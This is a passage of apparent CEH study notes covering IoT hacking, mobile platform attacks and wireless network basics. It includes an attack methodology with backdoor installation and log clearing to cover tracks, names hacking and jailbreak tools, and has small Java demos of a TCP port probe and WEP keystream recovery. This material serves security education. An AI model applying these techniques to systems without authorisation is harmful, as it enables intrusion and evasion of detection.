  • Monitoring activities
  • Higher multi-tenancy
  • Service level agreement (SLA)
  • Supply chain management
CEH (XX): Cloud Computing

CEH (XIX): IoT Hacking

The index of this series of articles can be found here.

IoT is the concept of basically connecting any device with an on and off switch to the Internet (and/or to each other). This includes everything from cellphones, coffee makers, washing machines, headphones, lamps, wearable devices and almost anything else you can think of. This also applies to components of machines, for example, a jet engine of an aeroplane or the drill of an oil rig. As I mentioned, if it has an on and off switch then chances are it can be a part of the IoT.

On a broader scale, the IoT can be applied to things like transportation networks: “smart cities” can help us reduce waste and improve efficiency for things such as energy use, thus helping us understand and improve how we work and live.

The architecture of IoT depends upon five layers which are:

  • Application layer: The layer responsible for delivering data to the users. This is the user interface to control, manage and command IoT devices.
  • Middleware layer: It is for device and information management.
  • Internet layer: It is responsible for endpoint connectivity.
  • Access gateway layer: It is responsible for protocol translation and messaging.
  • Edge technology layer: It covers IoT-capable devices.

IoT Communication Models

There are several ways in which IoT devices can communicate. The following are some of these models:

  • Device-to-Device Model: A basic model where two devices talk to each other without involving any other device. Communication is established using some kind of wireless connection; Wi-Fi, Bluetooth, NFC or RFID are examples of this model.
  • Device-to-Cloud Model: In this model, IoT devices communicate with an application server in the cloud. For example, in manufacturing environments a usually large number of sensors send information to a server; the application server processes the data and performs automated actions based on that analysis (see the sketch after this list).
  • Device-to-Gateway Model: Similar to the Device-to-Cloud model, but an IoT gateway is added. The gateway collects the data from the devices and sends it to a remote application server. It also offers a consolidated point to check that the data is flowing correctly, and it can provide security and protocol translation functionalities.
  • Back-End Data-sharing Model: This model extends the Device-to-Cloud model to a scalable scenario where multiple parties can access and control IoT devices and sensors. In this model, IoT devices communicate with an application server too.
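
A rough sketch of the Device-to-Cloud model mentioned above: a device-side program posts a sensor reading to an application server over HTTPS using the standard java.net.http client (Java 11+). The endpoint URL and the JSON payload are invented for the example:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class SensorUplink {

    public static void main(String[] args) throws Exception {
        // Hypothetical application server endpoint collecting readings.
        String endpoint = "https://iot.example.com/api/readings";
        String payload = "{\"deviceId\":\"sensor-42\",\"temperature\":21.5}";

        HttpClient client = HttpClient.newHttpClient();
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create(endpoint))
                .header("Content-Type", "application/json")
                .POST(HttpRequest.BodyPublishers.ofString(payload))
                .build();

        // The server would store the reading and trigger any automated actions.
        HttpResponse<String> response =
                client.send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println("Server replied with status " + response.statusCode());
    }
}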

Understanding IoT Attacks

In addition to traditional attacks, other major challenges can be found in IoT environments:

  • Lack of security
  • Vulnerable interfaces
  • Physical security risk
  • Lack of vendor support
  • Difficulties to update firmware and OS
  • Interoperability issues

The latest version of the OWASP IoT Top 10 defines the following vulnerabilities:

  • Weak, Guessable, or Hardcoded Password: Use of easily brute-forced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grants unauthorized access to deployed systems.
  • Insecure Network Services: Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control.
  • Insecure Ecosystem Interfaces: Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allow compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.
  • Lack of Secure Update Mechanism: Lack of ability to securely update the device. This includes lack of firmware validation on devices, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.
  • Use of Insecure or Outdated Components: Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms and the use of third-party software or hardware components from a compromised supply chain.
  • Insufficient Privacy Protection: User’s personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.
  • Insecure Data Transfer and Storage: Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.
  • Lack of Device Management: Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities.
  • Insecure Default Settings: Devices or systems shipped with insecure default settings or lack the ability to make the system more secure by restricting operators from modifying configurations.
  • Lack of Physical Hardening: Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.

IoT Attack Areas

The following are the most common attack areas for IoT networks:

  • Device memory containing credentials
  • Access control
  • Firmware extraction
  • Privileges escalation
  • Resetting to an insecure state
  • Removal of storage media
  • Web attack
  • Firmware attacks
  • Network services attacks
  • Unencrypted local data storage
  • Confidentiality and integrity issues
  • Cloud computing attacks
  • Malicious updates
  • Insecure APIs
  • Mobile application threats

IoT Attacks

  • DDoS attacks: Using this technique all the services associated with an IoT network can be targeted, devices, gateways and application servers.
  • Rolling code attacks: Rolling code or code hopping is another technique where the attacker captures the code, sequence or signal coming from the transmitter device while simultaneously blocking the receiver. The captured code is used later to gain unauthorised access; for example, the unlock signal of a car can be recorded and replayed later.
  • BlueBorne attacks: It is the use of different techniques to exploit Bluetooth vulnerabilities to gain unauthorised access.
  • Jamming attack: Jamming a signal to prevent devices from communicating.
  • Backdoor: Deploying a backdoor on the computer of an employee or victim to gain access to the IoT network. Attacks do not always need to target the IoT devices themselves.

Other general attacks are:

  • Eavesdropping
  • Sybil attack
  • Exploit kits
  • MitM attacks
  • Replay attacks
  • Forged malicious devices
  • Side-channel attack
  • Ransomware attack

IoT Hacking Methodology

The methodology applied to IoT platforms is the same as the one applied to other platforms.

  • Information gathering: IP addresses, running protocols, open ports, type of devices, vendor’s information, etc. Shodan, Censys and Thingful are search engines to find information about IoT devices. Shodan is a great tool for discovering and gathering information from IoT devices deployed around the world.
  • Vulnerability scanning: Scanning the network and devices looking for vulnerabilities, weak passwords, software and firmware bugs, default configurations, etc. Nmap and other tools are very helpful here (see the sketch after this list).
  • Launch attack: Exploiting the vulnerabilities using different attacks like DDoS, Rolling code, jamming, etc. RFCrack, Attify Zigbee and HackRF One are popular tools for hacking.
  • Gain access: Taking control over an IoT environment. Gaining access, escalating privileges, and backdoor installation are included in this phase among others.
  • Maintain attack: Includes logging out without being detected, clearing logs and covering tracks.
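
As a minimal illustration of the scanning phase, the following sketch probes a handful of common ports on a device using plain TCP connections; the target address is a placeholder, and something like this should only be run against devices we are authorised to test. Dedicated tools like Nmap do this far more thoroughly:

import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.Socket;

public class SimplePortProbe {

    public static void main(String[] args) {
        String target = "192.168.1.50"; // placeholder address of an IoT device we own
        int[] ports = {22, 23, 80, 443, 1883, 8080}; // SSH, Telnet, HTTP, HTTPS, MQTT, alt-HTTP

        for (int port : ports) {
            try (Socket socket = new Socket()) {
                // A short timeout keeps the probe quick when a port is filtered.
                socket.connect(new InetSocketAddress(target, port), 500);
                System.out.println("Port " + port + " is open");
            } catch (IOException e) {
                System.out.println("Port " + port + " is closed or filtered");
            }
        }
    }
}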

Countermeasures

Countermeasures include:

  • Firmware updates
  • Block unnecessary ports
  • Disable telnet
  • Use encrypted communication such as SSL/TLS (see the sketch after this list)
  • Use strong passwords
  • Use encryption in drivers
  • User account lockout
  • Periodic assessment of devices
  • Secure password recovery
  • Two-factor authentication
  • Disable UPnP
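
Regarding the SSL/TLS countermeasure in the list above, a device-side connection can be wrapped in TLS with the standard SSLSocketFactory. A minimal sketch, where the host name is a placeholder and things like certificate pinning or mutual TLS are left out:

import java.io.OutputStream;
import java.nio.charset.StandardCharsets;

import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

public class TlsUplink {

    public static void main(String[] args) throws Exception {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();

        // Placeholder backend host; the JVM trust store validates its certificate.
        try (SSLSocket socket = (SSLSocket) factory.createSocket("iot.example.com", 443)) {
            socket.startHandshake(); // fails if the certificate chain is not trusted

            OutputStream out = socket.getOutputStream();
            out.write("device heartbeat\n".getBytes(StandardCharsets.UTF_8));
            out.flush();
        }
    }
}
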
CEH (XIX): IoT Hacking

CEH (XVIII): Hacking Mobile Platforms

The index of this series of articles can be found here.

Mobile phones are nowadays everywhere. They are used for entertainment, work, personal finances and services, almost anything we can imagine. In addition, there is a big variety of systems running on these mobile devices in the market, such as iOS, BlackBerry OS, Android, Symbian, Windows, etc.

For all these reasons, mobile devices must have strong security, not just a feeling of being secure, to protect their users and all the private information they store. Plus, with the Bring Your Own Device philosophy, these devices can cause multiple problems in corporate environments and networks.

Mobile Platform Attack Vectors

The OWASP project publishes an unbiased and practical list of the top 10 most common attacks on mobile platforms:

Top 10 (2016) | Top 10 (2014)
Improper Platform Usage | Weak Server Side Controls
Insecure Data Storage | Insecure Data Storage
Insecure Communication | Insufficient Transport Layer Protection
Insecure Authentication | Unintended Data Leakage
Insufficient Cryptography | Poor Authorization and Authentication
Insecure Authorization | Broken Cryptography
Client Code Quality | Client-Side Injection
Code Tampering | Security Decisions Via Untrusted Inputs
Reverse Engineering | Improper Session Handling
Extraneous Functionality | Lack of Binary Protections

More information can be found at the project’s page OWASP Mobile Top 10.

Mobile Attack Vector

There are several threats and attacks on mobile devices. Some of the most basic examples are malware, data loss, integrity attacks, social engineering attacks, etc. Mobile attack vectors include:

  • Malware
  • Data loss
  • Data Tampering
  • Data Exfiltration

Vulnerabilities and Risks on Mobile Platforms

Some of the risks for mobile platforms are:

  • Malicious third-party applications
  • Malicious applications on Store
  • Malware and rootkits
  • Application vulnerabilities
  • Data security
  • Excessive permissions
  • Weak encryption
  • Operating system update issues
  • Application update issues
  • Jailbreak and rooting
  • Physical attacks

Application Sandbox Issue

Application sandboxing, also called application containerization, is an approach to software development and mobile application management (MAM) that limits the environments in which certain code can execute.

The goal of sandboxing is to improve security by isolating an application to prevent outside malware, intruders, system resources or other applications from interacting with the protected app. The term sandboxing comes from the idea of a child’s sandbox, in which the sand and toys are kept inside a small container or walled area.

Application sandboxing is controversial because its complexity can cause more security problems than the sandbox was originally designed to prevent. The sandbox has to contain all the files the application needs to execute, which can also create problems between applications that need to interact with one another. Still, it is one of the best security methods to be used when developing for mobile devices.

However, advanced malicious applications can be designed to bypass sandbox technology. Fragmented code and sleep timers are common techniques adopted by attackers to bypass the inspection process.

Mobile Spam and Phishing

Mobile devices and technologies are just another path attackers can choose to send emails or messages spamming users or trying to convince them to click and access malicious links searching for credentials or information.

Open Wi-Fi and Bluetooth Networks

Public or unencrypted Wi-Fi or Bluetooth networks are another easy way for attackers to intercept communications and reveal information.

Hacking Android OS

Android is an operating system developed by Google for smartphones. It is not only present in smartphones; it can also be found in other devices like gaming consoles, PCs and IoT devices. Android OS brings flexible features on an open-source platform.

One of Android's major features is its very wide support for and integration with different hardware and services, and it receives periodic updates.

One of its most successful features is also one of the major security flaws of Android devices: the flexibility to install third-party apps, not just from trusted stores but also as applications (APKs) from other sources on the Internet.

Device Administration API

In version 2.2 of Android, the Device Administration API was introduced to enable device administration at the system level, offering control over Android devices within a corporate network. Using this security-aware API, administrators can perform several actions, including wiping the device remotely or managing installed applications.

Root Access / Android Rooting

Rooting is basically the process of gaining privileged control over a device, commonly known as root access. As in any other Linux kernel-based system, root access gives superuser permissions. These permissions allow users to modify system settings and configurations and to overcome limitations and restrictions. The rooting process can be used for malicious purposes such as installing malicious applications, flashing custom firmware or giving unnecessary permissions to applications.

Android stack

Android Phone Security Tools

There are multiple Android security tools that can be found in the stores but, when installing them, users need to make sure of their authenticity and that the companies or developers behind them are legitimate.

Hacking iOS

iOS is the operating system developed by Apple for the iPhone, and nowadays it can also be found in other devices from the company, like iPads and iPods. Together with Android, they are the two most popular operating systems for mobile devices.

Major versions of the operating system tend to be released yearly. Two of the major security improvements iOS brings to the table are hardware-accelerated encryption and application isolation, where one application cannot access another application’s data.

iOS Jailbreak

A jailbreak is a form of rooting resulting in privilege escalation. Jailbreaking is usually done to remove or bypass factory default restrictions by using kernel patches or device customisation. A jailbreak gives root access to the device, which allows users to install unofficial applications.

Types of Jailbreak

  • Userland exploits: This jailbreak allows user-level access without escalating to boot-level access.
  • iBoot exploits: This jailbreak allows user-level and boot-level access.
  • Bootrom exploits: This jailbreak allows user-level and boot-level access.

Jailbreak Techniques

  • Tethered Jailbreak: A tethered jailbreak is one that temporarily pwns a handset for a single boot. After the device is turned off (or the battery dies), it cannot complete a boot cycle without the help of a computer-based jailbreak application and a physical cable connection between the device and the computer in question.
  • Semi-tethered Jailbreak: A semi-tethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a computer-based jailbreak application is deployed over a physical cable connection between the device and the computer in question.
  • Semi-untethered Jailbreak: A semi-untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a side-loaded jailbreak app on the device itself is deployed.
  • Untethered Jailbreak: An untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned without any interruption to jailbreak-oriented functionality.

Jailbreak Tools

There are multiple jailbreak tools such as:

  • Pangu
  • evasi0n7
  • LimeRa1n
  • BlackRa1n

Hacking Windows Phone OS

Windows Phone OS is another mobile operating system, developed by Microsoft. Windows Phone 8 is the second generation of the Windows Phone mobile operating system from Microsoft. It was released on October 29, 2012, and, like its predecessor, it features a flat user interface based on the Metro design language. It was succeeded by Windows Phone 8.1, which was unveiled on April 2, 2014.

Windows Phone 8 replaces the Windows CE-based architecture used in Windows Phone 7 with the Windows NT kernel found in Windows 8. Current Windows Phone 7 devices cannot run or update to Windows Phone 8, and new applications compiled specifically for Windows Phone 8 are not made available for Windows Phone 7 devices. Developers can make their apps available on both Windows Phone 7 and Windows Phone 8 devices by targeting both platforms via the proper SDKs in Visual Studio.

Windows Phone 8 devices are manufactured by Microsoft Mobile (formerly Nokia), HTC, Samsung and Huawei.

Some features supported are:

  • Native code support (C++)
  • NFC
  • Remote device management
  • VoIP and video chat integration
  • UEFI and firmware over-the-air updates for Windows Phone
  • App sandboxing

Hacking BlackBerry

BlackBerry OS is a proprietary mobile operating system designed specifically for Research In Motion’s (RIM) BlackBerry devices. The BlackBerry OS runs on Blackberry variant phones.

The BlackBerry OS is designed for smartphone environments and is best known for its robust support for push Internet email, and it was considered among the most prominent and secure mobile phone platforms.

Traditionally, BlackBerry applications are written using Java, particularly the Java Micro Edition (Java ME) platform. However, RIM introduced the BlackBerry Web development platform in 2010, which makes use of the widget software development kit (SDK) to create small standalone Web apps made up of HTML, CSS and JavaScript code.

BlackBerry Attack Vectors

  • Malicious code signing: The process in which an attacker, after obtaining a code-signing key from the code-signing service, signs a malicious application and uploads it to the BlackBerry App Store to be distributed to users.
  • JAD file exploits: JAD stands for Java Application Descriptor file. Files with the .jad extension are descriptor files commonly used to describe the contents of a MIDlet created for the Java ME virtual machine. Attackers can trick users into installing malicious .jad files that point to malicious download links, or the files can even be crafted to run DoS attacks.

Mobile Device Management (MDM)

Mobile device management (MDM) is the process of managing everything about a mobile device. MDM includes storing essential information about mobile devices, deciding which apps can be present on the devices, locating devices, and securing devices if lost or stolen. Many businesses use a third-party mobile device management software such as Mobile Device Manager Plus to manage mobile devices. Mobile Device Management has expanded its horizons to evolve into Enterprise Mobility Management (EMM).

Mobile devices now have more capabilities than ever before, which has ultimately led to many enterprises adopting a mobile-only or mobile-first workforce. In these types of environments, both personal (BYOD) and corporate-owned mobile devices are the primary devices used for accessing or interacting with corporate data.

Mobile Device Management (MDM) is important for enterprises focussing on improving productivity and security. MDM solutions allow:

  • Easy deployments
  • Efficient Integrations
  • Manage multiple device types
  • Achieve compliance
  • Enhanced security
  • Remote management

And provide some functions such as:

  • Locking a device after a certain number of failed login attempts (see the sketch after this list).
  • Enforcement of strong password policies for all BYOD devices.
  • MDM can detect any hacking attempt on BYOD devices and limit network access for the affected devices.
  • Enforcing confidentiality by using encryption as per the organization’s policy.
  • Administration and implementation of Data Loss Prevention (DLP) for BYOD devices.
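
As a toy illustration of the first function in the list, the following sketch models a lockout policy that blocks a device after a configurable number of failed logins. A real MDM agent enforces this at the platform level, so the class and the threshold here are purely illustrative:

// Toy model of an MDM-style lockout policy: after maxFailures consecutive
// failed logins the device is considered locked until an admin resets it.
public class LockoutPolicy {

    private final int maxFailures;
    private int consecutiveFailures;
    private boolean locked;

    public LockoutPolicy(int maxFailures) {
        this.maxFailures = maxFailures;
    }

    public void recordLoginAttempt(boolean successful) {
        if (locked) {
            return; // already locked, ignore further attempts
        }
        if (successful) {
            consecutiveFailures = 0;
        } else if (++consecutiveFailures >= maxFailures) {
            locked = true;
        }
    }

    public boolean isLocked() {
        return locked;
    }

    public static void main(String[] args) {
        LockoutPolicy policy = new LockoutPolicy(3);
        policy.recordLoginAttempt(false);
        policy.recordLoginAttempt(false);
        policy.recordLoginAttempt(false);
        System.out.println("Device locked: " + policy.isLocked()); // true
    }
}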

MDM Deployment Methods

Generally, there are two types of deployments:

On-site MDM Deployment

Involves the installation of MDM applications on local servers inside the corporate data centres or offices, and it is managed by local staff available on-premises.

The major advantage is the granular control over the management of the BYOD devices, which, to some extent, improves security.

The on-site MDM deployment has the following components or areas:

  • Data centre: All the necessary services and servers to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. It includes firewalls, filters and monitors for ingress and egress traffic, and wireless controllers and access points for guest users.
  • Services layer: Contains wireless controllers and access points used by users in the corporate environment, and sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Campus Building: A distribution layer that acts as ingress/egress point for all traffic in a campus building, where users can connect using switches or wireless access points.

Cloud-based MDM deployment

In this type of deployment, the MDM software is installed and managed by a third-party service. This is one of its main advantages, as maintenance and troubleshooting are the responsibility of the service provider.

The cloud-based MDM deployment has the following components or areas:

  • Data centre: All the necessary services and servers to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. It includes firewalls, filters and monitors for ingress and egress traffic, and wireless controllers and access points for guest users.
  • WAN: Provides VPN connectivity from branch offices to the corporate office, internet access from branch offices and connectivity to the cloud-based MDM application software. It maintains policies and configurations for BYOD devices connected to the corporate network.
  • WAN edge: This component acts as the focal point for all ingress/egress WAN traffic coming from and going to branch offices.
  • Services layer: Contains wireless controllers and access points used by users in the corporate environment, and sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Branch offices: This component comprises a few routers acting as the focal point for ingress and egress traffic in branch offices. Users can connect using access switches or wireless access points.

Bring Your Own Device (BYOD)

The BYOD concept makes life easier for users but represents new challenges for network engineers and designers, who need to find a way to balance constantly changing networks and seamless wireless connectivity with maintaining good security for their organisations.

Some reasons to implement BYOD solutions are:

  • A wide variety of consumer devices: Smartphones, tablets, laptops and other devices of multiple brands and types belonging to users nowadays need to be added to the network; they need to comply with the organisation’s policies and, of course, have full connectivity.
  • No schedules: There are no longer strict working hours; users can join the network whenever it is convenient for them, early, late, at lunch time or even on weekends.
  • Delocalisation: Users no longer work only from office buildings or corporate environments; they can now connect from everywhere and need access to company resources.

BYOD Architecture Framework

Some elements that can be found in BYOD environments are:

  • BYOD devices: All the devices allowed to connect to the corporate network to allow users to perform their job.
  • Wireless access points: They provide wireless connectivity on-premises and they are installed in the physical network of a company.
  • Wireless LAN controllers: WLAN controllers provide centralised management and monitoring of the WLAN solution. They are integrated with the identity service engine to enforce the authentication and authorisation of the BYOD devices.
  • Identity service engine: It implements the authentication, authorisation and accounting for endpoint devices.
  • VPN solutions: They provide connectivity to corporate networks for end-users, allowing confidentiality of data.
  • Integrated services router (ISR): Preferred in BYOD architectures to provide WAN and Internet access in corporate environments to BYOD devices.
  • Aggregation services router (ASR): It provides WAN and Internet access in corporate environments and acts as aggregation points for connections coming from the branches and home-offices.
  • Cloud web security (CWS): It provides enhanced web security for all BYOD devices that access the Internet using public 3G/4G networks.
  • Adaptive security appliance (ASA): It provides standard security solutions at the Internet edge like IDS or IPS and acts as a termination point for the VPN connections.
  • RSA SecurID: It provides one-time passwords to access network applications for BYOD devices.
  • Active Directory: It provides central command and control of domain users, computers and network printers. It restricts access to network resources.
  • Certificate authority: It grants network access only to BYOD devices that have a valid certificate installed.

Mobile Security Guidelines

Mobile devices have a large number of built-in security features and measures; these, together with tools available on the stores, can provide good security. In addition, some beneficial guidelines to secure mobile phones are as follows:

  • Avoid auto-upload of files and photos.
  • Perform security assessments of applications.
  • Turn off Bluetooth when not in use.
  • Allow only necessary GPS-enabled applications.
  • Do not connect to open networks or public networks unless it is necessary.
  • Install applications from trusted or official stores.
  • Configure strong passwords.
  • Use mobile device management software.
  • Use remote wipe services.
  • Update operating systems.
  • Do not allow rooting/jailbreaking.
  • Encrypt your phone.
  • Periodic backups.
  • Filter emails.
  • Configure application certification rules.
  • Configure mobile device policies.
  • Configure auto-lock.
CEH (XVIII): Hacking Mobile Platforms

CEH (XVII): Hacking Wireless Networks

The index of this series of articles can be found here.

A wireless network allows devices to stay connected to the network but roam untethered to any wires. Access points amplify Wi-Fi signals, so a device can be far from a router but still be connected to the network. Previously it was thought that wired networks were faster and more secure than wireless networks. But continual enhancements to wireless network technology such as the Wi-Fi 6 networking standard have eroded speed and security differences between wired and wireless networks.

Usually, wireless communications rely on radio communications. Different frequency ranges are used for different types of wireless technologies depending upon the requirements.

Wireless Terminology

GSM

GSM (Global System for Mobile communications) is an open, digital cellular technology used for transmitting mobile voice and data services. GSM supports voice calls and data transfer speeds of up to 9.6 kbps, together with the transmission of SMS (Short Message Service).

GSM operates in the 900MHz and 1.8GHz bands in Europe and the 1.9GHz and 850MHz bands in the US. GSM services are also transmitted via 850MHz spectrum in Australia, Canada and many Latin American countries. The use of harmonised spectrum across most of the globe, combined with GSM’s international roaming capability, allows travellers to access the same mobile services at home and abroad. GSM enables individuals to be reached via the same mobile number in up to 219 countries.

Terrestrial GSM networks now cover more than 90% of the world’s population. GSM satellite roaming has also extended service access to areas where terrestrial coverage is not available.

Access Point

A wireless access point (WAP), or more generally just access point (AP), is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. The AP usually connects to a router (via a wired network) as a standalone device, but it can also be an integral component of the router itself. An AP is differentiated from a hotspot which is a physical location where Wi-Fi access is available.

SSID

A Wi-Fi network’s SSID is the technical term for its network name. SSID stands for “Service Set Identifier”. Under the IEEE 802.11 wireless networking standard, a “service set” refers to a collection of wireless networking devices with the same parameters. So, the SSID is the identifier (name) that tells you which service set (or network) to join.

BSSID

The BSSID is the MAC address of the wireless access point (WAP) generated by combining the 24-bit Organization Unique Identifier (the manufacturer’s identity) and the manufacturer’s assigned 24-bit identifier for the radio chipset in the WAP.
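
As a small worked example, splitting a BSSID into those two halves is straightforward; the MAC address below is made up, with the first three octets being the OUI and the last three identifying the radio chipset:

public class BssidParts {

    public static void main(String[] args) {
        String bssid = "00:1A:2B:3C:4D:5E"; // made-up example BSSID

        String[] octets = bssid.split(":");
        String oui = String.join(":", octets[0], octets[1], octets[2]);
        String deviceId = String.join(":", octets[3], octets[4], octets[5]);

        System.out.println("OUI (manufacturer): " + oui);            // 00:1A:2B
        System.out.println("Radio chipset identifier: " + deviceId); // 3C:4D:5E
    }
}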

ISM Band

The Industrial, Scientific and Medical (ISM) band is a part of the radio spectrum that can be used for any purpose without a license in most countries. The 902-928 MHz, 2.4 GHz and 5.7-5.8 GHz bands were originally intended for machines that emit radio frequencies, such as industrial heaters and microwave ovens, rather than for radio communications.

Orthogonal Frequency Division Multiplexing (OFDM)

Orthogonal Frequency Division Multiplexing is a digital transmission technique that uses a large number of carriers spaced apart at slightly different frequencies. First promoted in the early 1990s for wireless LANs, OFDM is used in many wireless applications including Wi-Fi, WiMAX, LTE, ultra-wideband (UMB), as well as digital radio and TV broadcasting in Europe and Japan. It is also used in land-based ADSL (see OFDMA).

Frequency-hopping Spread Spectrum (FHSS)

Frequency-hopping spread spectrum (FHSS) is a method of transmitting radio signals by rapidly changing the carrier frequency among many distinct frequencies occupying a large spectral band. The changes are controlled by a code known to both transmitter and receiver. FHSS is used to avoid interference, to prevent eavesdropping, and to enable code-division multiple access (CDMA) communications.
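
As a conceptual sketch, not a real radio implementation, the following snippet shows how a transmitter and a receiver that share the same seed (the “code”) derive the same pseudo-random hop sequence over a set of channels, which is the core idea behind FHSS:

import java.util.Random;

public class HopSequenceDemo {

    // Both ends derive the channel sequence from a shared seed (the "code"),
    // so they hop together while an outsider sees apparently random jumps.
    static int[] hopSequence(long sharedSeed, int channels, int hops) {
        Random prng = new Random(sharedSeed);
        int[] sequence = new int[hops];
        for (int i = 0; i < hops; i++) {
            sequence[i] = prng.nextInt(channels);
        }
        return sequence;
    }

    public static void main(String[] args) {
        long sharedSeed = 0xC0FFEE;
        int[] transmitter = hopSequence(sharedSeed, 79, 10);
        int[] receiver = hopSequence(sharedSeed, 79, 10);

        System.out.println(java.util.Arrays.toString(transmitter));
        System.out.println(java.util.Arrays.equals(transmitter, receiver)); // true
    }
}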

Types of Networks

Types of wireless networks deployed in a geographical area can be categorised as:

  • Wireless personal area network (WPAN)
  • Wireless local area network (WLAN)
  • Wireless metropolitan area network (WMAN)
  • Wireless wide area network (WWAN)

However, a wireless network can be defined in different types depending upon the deployment scenarios. The following are some of the wireless network types that are used in different scenarios:

  • Extension to a wired network
  • Multiple access points
  • 3G/4G hotspot

Wireless Standards

Standard | Frequency | Modulation | Speed
802.11a | 5 GHz | OFDM | 54 Mbps
802.11b | 2.4 GHz | DSSS | 11 Mbps
802.11g | 2.4 GHz | OFDM, DSSS | 54 Mbps
802.11n | 2.4/5 GHz | OFDM | up to 600 Mbps
802.16 (WiMAX) | 10 – 66 GHz | OFDM | 70 – 1000 Mbps
Bluetooth | 2.4 GHz | (not specified) | 1 – 3 Mbps

Wi-Fi

Wi-Fi is a family of wireless networking technologies, based on the IEEE 802.11 family of standards, which are commonly used for local area networking of devices and Internet access. Wi‑Fi is a trademark of the non-profit Wi-Fi Alliance, which restricts the use of the term Wi-Fi Certified to products that successfully complete interoperability certification testing.

They transmit at frequencies of 2.4 GHz or 5 GHz. This frequency is considerably higher than the frequencies used for cell phones, walkie-talkies and televisions. The higher frequency allows the signal to carry more data.

They use 802.11 networking standards, which come in several flavours:

  • 802.11a transmits at 5 GHz and can move up to 54 megabits of data per second. It also uses orthogonal frequency-division multiplexing (OFDM), a more efficient coding technique that splits that radio signal into several sub-signals before they reach a receiver. This greatly reduces interference.
  • 802.11b is the slowest and least expensive standard. For a while, its cost made it popular, but now it is becoming less common as faster standards become less expensive. 802.11b transmits in the 2.4 GHz frequency band of the radio spectrum. It can handle up to 11 megabits of data per second, and it uses complementary code keying (CCK) modulation to improve speeds.
  • 802.11g transmits at 2.4 GHz like 802.11b, but it is a lot faster – it can handle up to 54 megabits of data per second. 802.11g is faster because it uses the same OFDM coding as 802.11a.
  • 802.11n is the most widely available of the standards and is backwards compatible with a, b and g. It significantly improved speed and range over its predecessors. For instance, although 802.11g theoretically moves 54 megabits of data per second, it only achieves real-world speeds of about 24 megabits of data per second because of network congestion. 802.11n, however, reportedly can achieve speeds as high as 140 megabits per second. 802.11n can transmit up to four streams of data, each at a maximum of 150 megabits per second, but most routers only allow for two or three streams.
  • 802.11ac is the newest standard as of early 2013. It has yet to be widely adopted and is still in draft form at the Institute of Electrical and Electronics Engineers (IEEE), but devices that support it are already on the market. 802.11ac is backwards compatible with 802.11n (and therefore the others, too), with n on the 2.4 GHz band and ac on the 5 GHz band. It is less prone to interference and far faster than its predecessors, pushing a maximum of 450 megabits per second on a single stream, although real-world speeds may be lower. Like 802.11n, it allows for transmission on multiple spatial streams – up to eight, optionally. It is sometimes called 5G WiFi because of its frequency band, sometimes Gigabit WiFi because of its potential to exceed a gigabit per second on multiple streams and sometimes Very High Throughput (VHT) for the same reason.

Wi-Fi Authentication Modes

There are different authentication methods for WiFi-based networks:

Open Authentication to the Access Point

Open authentication allows any device to authenticate and then attempt to communicate with the access point. Using open authentication, any wireless device can authenticate with the access point, but the device can communicate only if its Wired Equivalent Privacy (WEP) keys match the access point’s WEP keys. Devices that are not using WEP do not attempt to authenticate with an access point that is using WEP. Open authentication does not rely on a RADIUS server on your network.

Shared Key Authentication to the Access Point

During shared key authentication, the access point sends an unencrypted challenge text string to any device that is attempting to communicate with the access point. The device that is requesting authentication encrypts the challenge text and sends it back to the access point. If the challenge text is encrypted correctly, the access point allows the requesting device to authenticate.

Both the unencrypted challenge and the encrypted challenge can be monitored, however, which leaves the access point open to attack from an intruder who calculates the WEP key by comparing the unencrypted and encrypted text strings. Because of this vulnerability to attack, shared key authentication can be less secure than open authentication. Like open authentication, shared key authentication does not rely on a RADIUS server on your network.
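
The weakness can be shown in a few lines: because WEP encrypts the challenge by XORing it with an RC4 keystream, anyone who captures both the plaintext challenge and the encrypted response can XOR them together and recover the keystream for that IV. The byte values below are made up just to show the arithmetic:

import java.util.Arrays;

public class SharedKeyWeakness {

    static byte[] xor(byte[] a, byte[] b) {
        byte[] out = new byte[a.length];
        for (int i = 0; i < a.length; i++) {
            out[i] = (byte) (a[i] ^ b[i]);
        }
        return out;
    }

    public static void main(String[] args) {
        // Made-up values standing in for captured traffic.
        byte[] challenge = {0x10, 0x22, 0x35, 0x47};        // plaintext sent by the AP
        byte[] keystream = {0x5A, (byte) 0xC3, 0x7E, 0x01}; // secret RC4 output
        byte[] response = xor(challenge, keystream);        // what the client transmits

        // The eavesdropper XORs the two captured values...
        byte[] recovered = xor(challenge, response);

        // ...and obtains the keystream, reusable to forge frames for this IV.
        System.out.println(Arrays.equals(recovered, keystream)); // true
    }
}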

EAP Authentication to the Network

